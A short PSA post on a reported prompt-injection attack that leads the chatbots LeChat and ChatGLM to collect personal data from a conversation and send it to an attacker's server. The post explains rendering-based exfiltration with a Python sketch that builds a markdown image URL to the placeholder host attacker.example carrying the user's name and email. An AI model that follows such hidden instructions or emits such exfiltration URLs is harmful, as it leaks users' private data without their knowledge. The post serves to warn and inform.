The Risks of Including Personal Details in AI Chats

PSA: Here's another reason not to include personal details in AI chats

Security researchers have demonstrated a way to instruct AI chatbots to gather personal data from a conversation and upload it to an attacker-controlled server, raising fresh privacy and security concerns around AI chats. The researchers tested the method on two large language models, LeChat (from French AI company Mistral) and the Chinese chatbot ChatGLM, and found that users could be offered seemingly helpful prompts that secretly contain malicious instructions, obfuscated as gibberish that the AI can interpret but a human reader cannot. Experts warn that as more people use AI assistants and grant them greater authority over their activities, such attacks are likely to become more widespread.
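To see why this class of attack works without any code execution, consider one commonly documented exfiltration channel for prompt-injection attacks: the hidden instruction tells the model to output a markdown image whose URL embeds the harvested data, so the chat interface itself leaks the data the moment it renders the reply. The following minimal Python sketch illustrates the payload shape; the names, fields, and attacker endpoint are purely hypothetical, and this is not the researchers' exact method.

```python
from urllib.parse import urlencode

# Hypothetical PII that an injected prompt might tell the model to
# collect from the conversation (values are illustrative only).
pii = {"name": "Jane Doe", "email": "jane@example.com"}

# The hidden instruction asks the model to emit a markdown image whose
# URL carries the data as query parameters. When the chat UI renders
# the image, the user's browser issues a GET request to the attacker's
# server, silently delivering the data. "attacker.example" is a
# placeholder domain, not a real endpoint.
exfil_url = "https://attacker.example/c?" + urlencode(pii)
markdown_payload = f"![ ]({exfil_url})"

print(markdown_payload)
```

The user sees, at most, a broken image icon; no link needs to be clicked, which is what makes rendering-based exfiltration channels like this so quiet.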

#LLM